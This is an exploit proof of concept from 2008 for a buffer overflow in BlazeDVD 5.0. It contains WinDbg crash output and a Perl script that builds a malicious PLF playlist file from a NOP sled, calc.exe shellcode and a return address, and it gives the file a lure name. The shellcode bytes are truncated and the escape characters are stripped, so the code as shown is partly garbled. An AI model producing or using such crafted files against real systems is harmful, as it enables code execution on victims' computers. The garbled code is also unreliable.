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BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit



# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)


# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.

# It can provide superior video and audio(Dolby) quality, together with other

# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image

# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,

# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file

# you have the codec installed for.The DVD player software can be extensive

# compatible with hardware,which is operated stable,smoothly under Windows98,

# 98SE, Me, 2000, XP, VISTA.


# Product web Page:


# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be

# exploited via crafted PLF playlist file localy and remotely. It fails to

# perform boundry checking of the user input file, allowing the EIP to be

# overwritten, thus, controling the next insctruction of the software. After

# succesfull exploitation, calc.exe will be executed. Failed attempts will

# result in Denial Of Service (DoS).


# WinDgb(output):


# - (4d8.f80): Access violation - code c0000005 (first chance)

# - First chance exceptions are reported before any exception handling.

# - This exception may be expected and handled.

# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c

# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc

# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216

# - 41414141 ?? ???



# Tested on Microsoft Windows XP SP2 (English)


# Vulnerability discovered by: Parvez Anwar and Greg Linares


# Refs:


# -

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# -


# Exploit coded by Gjoko 'LiquidWorm' Krstic






# 08.08.2008

# print "n|==================================================================|n";

print "| |n";

print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |n";

print "| by LiquidWorm <liquidworm [at]> |n";

print "| |n";

print "|==================================================================|nn"; $nop = "x90" x 96;

# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub $shellcode = "x29xc9x83xe9xddxd9xee".
























$ret = "x78x53xbex01"; $payload = $nop.$shellcode.$ret; open(plf, ">./The_Dark_Knight.plf"); print plf "$payload"; print "n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!nn"; print "n...t00t w00t!nan";

# August, 2008

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